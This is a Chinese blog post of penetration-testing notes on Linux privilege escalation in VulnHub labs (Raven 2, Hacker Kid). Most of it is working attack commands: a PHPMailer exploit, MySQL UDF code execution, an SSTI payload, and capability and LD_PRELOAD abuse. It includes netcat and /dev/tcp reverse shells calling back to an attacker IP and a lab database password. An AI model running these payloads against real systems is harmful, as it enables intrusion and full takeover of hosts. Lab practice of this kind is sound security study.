Linux权限提升四

最新推荐文章于 2024-08-06 16:50:29 发布
最新推荐文章于 2024-08-06 16:50:29 发布
阅读量444 收藏 6
点赞数 4
文章标签: linux android 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyw268/article/details/139669739
版权

➢ Linux系统提权-Web&用户-数据库类型

➢ Linux系统提权-Web&用户-Capability能力

➢ Linux系统提权-普通用户-LD_Preload加载

#Linux系统提权-Web&用户-数据库类型

https://www.vulnhub.com/entry/raven-2,269/

1、信息收集:

http://192.168.139.155/vendor/

2、Web权限获取:

searchsploit phpmailer

find / -name 40969.py

cp /usr/share/exploitdb/exploits/php/webapps/40969.py p.py

python p.py

3、MYSQL-UDF提权:

-编译UDF.so

searchsploit udf

cp /usr/share/exploitdb/exploits/linux/local/1518.c . #复制到当前所在文件夹

gcc -g -shared -Wl,-soname,1518.so -o udf.so 1518.c -lc

python -m http.server 8080

-下载到目标上

python -c 'import pty; pty.spawn("/bin/bash")'

cd tmp

wget http://192.168.139.141:8080/udf.so

-连接进行导出调用

mysql -uroot -pR@v3nSecurity

select version(); #查看mysql版本

select @@basedir; #确认mysql安装位置

show variables like '%basedir%'; #确认mysql安装位置

show variables like '%secure%'; #查看可导出文件位置

show variables like '%plugin%'; #查找插件位置

show variables like '%compile%'; #查看系统版本

use mysql;

# 创建xiaodi表

create table xiaodi(line blob);

# 往xiaodi表中插入二进制的udf.so

insert into xiaodi values(load_file('/tmp/udf.so'));

# 导出udf.so

select * from xiaodi into dumpfile '/usr/lib/mysql/plugin/udf.so';

# 创建do_system自定义函数

create function do_system returns integer soname 'udf.so';

select do_system('nc 192.168.139.141 6666 -e /bin/bash');

#Linux系统提权-Web&用户-Capability能力

原理参考:https://www.cnblogs.com/f-carey/p/16026088.html

cp /usr/bin/php /tmp/php

设置能力:setcap cap_setuid+ep /tmp/php

删除能力:setcap -r /tmp/php

查看单个能力:getcap /usr/bin/php

查看所有能力:getcap -r / 2>/dev/null

Hacker_Kid

WP参考:https://www.jianshu.com/p/60673ac0454f

环境:https://www.vulnhub.com/entry/hacker-kid-101,719/

saket

Saket!#$%@!!

{% import os %}{{os.system('bash -c "bash -i &> /dev/tcp/192.168.139.141/6688 0>&1"')}}

http://192.168.139.156:9999/?name=%7B%25+import+os+%25%7D%7B%7Bos%2Esystem%28%27bash+%2Dc+%22bash+%2Di+%26%3E+%2Fdev%2Ftcp%2F192%2E168%2E139%2E141%2F6688+0%3E%261%22%27%29%7D%7D

/sbin/getcap -r / 2>/dev/null

python -m http.server 8080

wget http://192.168.139.141:8080/inject.py

for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 inject.py $i; done

nc 192.168.139.156 5600

结论:suid升级版,更细致的权限划分,通过能力有哪些权限设置进行利用

#Linux系统提权-普通用户-LD_Preload加载

参考:https://www.cnblogs.com/backlion/p/10503985.html

Defaults env_keep += LD_PRELOAD

test ALL=(ALL:ALL) NOPASSWD: /usr/bin/find

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

ls -al shell.so

sudo LD_PRELOAD=/tmp/shell.so find

whoami

Defaults env_keep += LD_PRELOAD

test ALL=(ALL:ALL) NOPASSWD: /tmp/LinEnum.sh

sudo LD_PRELOAD=/tmp/shell.so /tmp/LinEnum.sh

结论:sudo提权有限制,但是一旦设置了LD_PRELOAD,那么只要有程序既可提权

爱敲键盘的pig
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux权限
xxtzzxx的博客
08-08 1170
就像我们日常生活中提到的医生、教师、程序员等是对一种职业或是一类人的统称,而非指的是具体的某个人。查看上述代码不难看出,bash进程的数目在逐渐增多,会造成对操作系统资源的浪费,所以为了避免这样的情况发生,我们可以通过用户回退的方式来进行用户的切换。那当我们有这么一种需求,others可以在特定的目录下创建自己的文件、写入自己文件、删除自己的文件,但是不想让他删除别人的文件。此外,有这样的一个问题,如果一个目录文件对others具有w权限,那么用户是否能够删除掉目录文件中的其它拥有者的文件?......
THM Linux权限提升权限提升路径
04-22
创建thm文件,内容为执行的命令,赋予可执行权限,运行test文件,执行命令
Mysql_udf提权[超详细]|VulnHub-Raven:2渗透测试
qq_60115503的博客
04-22 2899
Mysql内置函数 Mysql有很多内置函数提供给使用者,包括字符串函数,数值函数,日期和时间函数等,给开发人员和使用者带来了很多方便 UDF介绍 Mysql的内置函数虽热丰富,但毕竟不能满足所有人的需求,有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候,就需要对Mysql进行一些扩展,幸运的是,Mysql给使用者提供了添加新函数的机制,这种使用者自行添加的Mysql函数就称为UDF(User Define Function)UDF机制能够起作用,必须...
Linux权限提升总结
m0_66458291的博客
04-01 1283
本文总结了Linux的一些提权检测项目和常见的提权方式,如suid提权 CVE提权,脏牛漏洞提权、脏管道提权、环境变量提权、定时任务天、权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权。
Linux权限提升
Williamanddog的博客
02-07 1441
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的 权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。 CVE-2016-5195,即 Dirty COW,俗称「脏牛」漏洞。它是 Linux Kernel 中的条件竞争漏 洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的 越权读写,恶意用户可利用此漏洞来获取高权限
Linux系统将普通用户权限提升
qq_42181775的博客
09-05 719
su xxx用户名命令1:查看当前用户名命令2:查看sudoers文件的权限命令3:将etc/sudoers文件权限,修改为可读写。命令4:vim打开etc/sudoers文件,将普通用户写入到红线处。
Linux权限委派相关学习笔记
04-25
总结来说,Linux权限委派是通过`sudo`命令和`/etc/sudoers`配置文件实现的,它提供了对系统资源访问的精细控制,使得在保持安全性的同时,能够高效地进行管理和维护。理解和熟练掌握这些知识点对于成为一名合格的...
防范权限提升-Linux提权手法超级攻略
08-17
防范权限提升-Linux提权手法超级攻略
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
权限提升-linux提权手法总结
01-14
基本Linux权限提升前的信息收集 在进行权限提升之前,攻击者需要收集大量的信息来帮助确定可行的攻击路径。这包括但不限于: - **操作系统类型**:通过`cat /etc/*-release`等命令来获取Linux发行版的信息。 - **...
Linux下部署python记录
龙井茶的Sky
08-06 900
在本地实现了一个python写的webapi,现在要部署到一个外网服务器测试,奈何服务器资源不是我的,而且配置很低。之前我是搞过直接Linux下docker部署python,但是服务器配置很低可能没法搞docker,只能直接在Linux服务器部署python。不过实际上,Linux直接部署、Linux下docker部署,差别不大的。最终,我还是采用了直接运行代码的方式。使用打包部署的方式一直没成功,主要问题在于,同一个服务器,直接运行代码没问题,但是打包部署运行,就提示缺包或找不到包的情况。
Linux地址空间详解
m0_74830524的博客
08-02 881
本篇通过对物理内存和页表详细的讲解,对 Linux 系统下的地址空间做了深度的剖析。
Linux:账号和权限管理(一)
shyuu的博客
08-04 752
Linux的账号和权限管理。Linux基于用户身份对资源访问进行控制。
linux 终端选择 VT100 VT102 VT200 Xterm linux Vshell 等都有什么区别
记录 分享 成就
08-06 244
Linux 系统中,终端类型通常指的是终端模拟器或终端控制程序所支持的特定功能和行为的集合。不同的终端类型支持不同的功能集,这些功能包括光标控制、文本格式化、屏幕滚动等。
Linux -ls 命令入门
最新发布
weixin_47515798的博客
08-06 135
Linux命令行在执行命令的时候,需要一个工作目录,打开命令行程序(终端)默认设置工作目录在用户的HOME目录。当不使用选项和参数,直接使用ls命令本体,表示:以平铺形式,列出当前工作目录下的内容。当前登录用户的HOME目录作为当前工作目录,所以ls命令列出的事HOME目录的内容。每一个用户在Linux系统的专属目录,默认在:/home/用户名。·-a -l -h是。
linux:phpstudy安装及日常命令使用[表格]
h1008685的博客
08-06 331
linux——phpstudy安装及日常使用命令
Linux之进程间通信(上)
qq_55958734的博客
08-06 565
匿名管道
Linux---进程(4)---进程优先级&&调度切换
m0_75102051的博客
08-03 790
本文介绍进程优先级、进程切换、进程调度
Windows/Linux权限提升策略全解析
1. 利用系统服务漏洞:通过查找和利用系统服务的未授权访问或权限提升点,攻击者可以提升权限。 2. 应用程序漏洞利用:某些应用程序可能存在设计缺陷,允许恶意代码通过这些漏洞获取管理员权限。 3. 操作系统本地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值